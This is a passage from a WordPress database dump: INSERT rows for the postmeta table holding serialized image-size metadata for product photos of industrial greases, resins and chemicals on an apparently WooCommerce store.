INSERT INTO `wp_postmeta` VALUES (18345, 1922, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2492;s:4:"file";s:32:"2016/09/specialty-products-3.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"specialty-products-3-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"specialty-products-3-800x513.jpg";s:5:"width";i:800;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"specialty-products-3-768x492.jpg";s:5:"width";i:768;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"specialty-products-3-1600x1026.jpg";s:5:"width";i:1600;s:6:"height";i:1026;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"specialty-products-3-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"specialty-products-3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"specialty-products-3-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"specialty-products-3-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18346, 1923, '_wp_attached_file', '2016/09/Vazo-radical-intiator-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18347, 1923, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5905;s:6:"height";i:5905;s:4:"file";s:35:"2016/09/Vazo-radical-intiator-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"Vazo-radical-intiator-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"Vazo-radical-intiator-2-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"Vazo-radical-intiator-2-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"Vazo-radical-intiator-2-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"Vazo-radical-intiator-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"Vazo-radical-intiator-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"Vazo-radical-intiator-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"Vazo-radical-intiator-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"24";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18348, 1924, '_wp_attached_file', '2016/08/EPON-RESIN-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18349, 1924, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/08/EPON-RESIN-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPON-RESIN-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPON-RESIN-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPON-RESIN-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPON-RESIN-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPON-RESIN-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPON-RESIN-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPON-RESIN-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPON-RESIN-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18350, 1925, '_wp_attached_file', '2016/08/EPIKURE-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18351, 1925, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPIKURE-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPIKURE-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPIKURE-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPIKURE-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPIKURE-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPIKURE-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18352, 986, '_thumbnail_id', '1924'); 
INSERT INTO `wp_postmeta` VALUES (18353, 986, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18354, 1926, '_wp_attached_file', '2016/09/krytox-other-grease-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18355, 1926, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:35:"2016/09/krytox-other-grease-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"krytox-other-grease-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18356, 1927, '_wp_attached_file', '2016/09/ReleaSys-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18357, 1927, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4004;s:4:"file";s:48:"2016/09/ReleaSys-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:50:"ReleaSys-semi-permanent-mold-release-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18358, 1928, '_wp_attached_file', '2016/08/krytox-fpg-028-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18359, 1928, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:28:"2016/08/krytox-fpg-028-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-028-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"krytox-fpg-028-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"krytox-fpg-028-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"krytox-fpg-028-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-028-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-028-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"krytox-fpg-028-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"krytox-fpg-028-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18360, 1929, '_wp_attached_file', '2016/08/krytox-fpg-128-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18361, 1929, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2222;s:6:"height";i:1666;s:4:"file";s:28:"2016/08/krytox-fpg-128-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-128-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"krytox-fpg-128-1-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"krytox-fpg-128-1-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"krytox-fpg-128-1-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-128-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-128-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"krytox-fpg-128-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"krytox-fpg-128-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18362, 1930, '_wp_attached_file', '2016/08/krytox-fpg-grease-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18363, 1931, '_wp_attached_file', '2016/09/Boron-nitride.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18364, 1930, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4726;s:6:"height";i:2984;s:4:"file";s:31:"2016/08/krytox-fpg-grease-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"krytox-fpg-grease-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"krytox-fpg-grease-1-800x505.jpg";s:5:"width";i:800;s:6:"height";i:505;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"krytox-fpg-grease-1-768x485.jpg";s:5:"width";i:768;s:6:"height";i:485;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"krytox-fpg-grease-1-1600x1010.jpg";s:5:"width";i:1600;s:6:"height";i:1010;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"krytox-fpg-grease-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"krytox-fpg-grease-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"krytox-fpg-grease-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"krytox-fpg-grease-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18365, 1931, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:25:"2016/09/Boron-nitride.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"Boron-nitride-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"Boron-nitride-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"Boron-nitride-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"Boron-nitride-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"Boron-nitride-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"Boron-nitride-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"Boron-nitride-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"Boron-nitride-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18366, 1932, '_wp_attached_file', '2016/09/Krytox-electronic-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18367, 1932, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6931;s:6:"height";i:4625;s:4:"file";s:36:"2016/09/Krytox-electronic-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"Krytox-electronic-grease-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18368, 1933, '_wp_attached_file', '2016/09/krytox-electronic-grease-electric.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18369, 1933, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5175;s:6:"height";i:3450;s:4:"file";s:45:"2016/09/krytox-electronic-grease-electric.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:47:"krytox-electronic-grease-electric-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18370, 1934, '_wp_attached_file', '2016/09/krytox-eg-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18371, 1934, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2848;s:6:"height";i:2848;s:4:"file";s:28:"2016/09/krytox-eg-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"krytox-eg-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"krytox-eg-grease-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"krytox-eg-grease-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"krytox-eg-grease-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"krytox-eg-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"f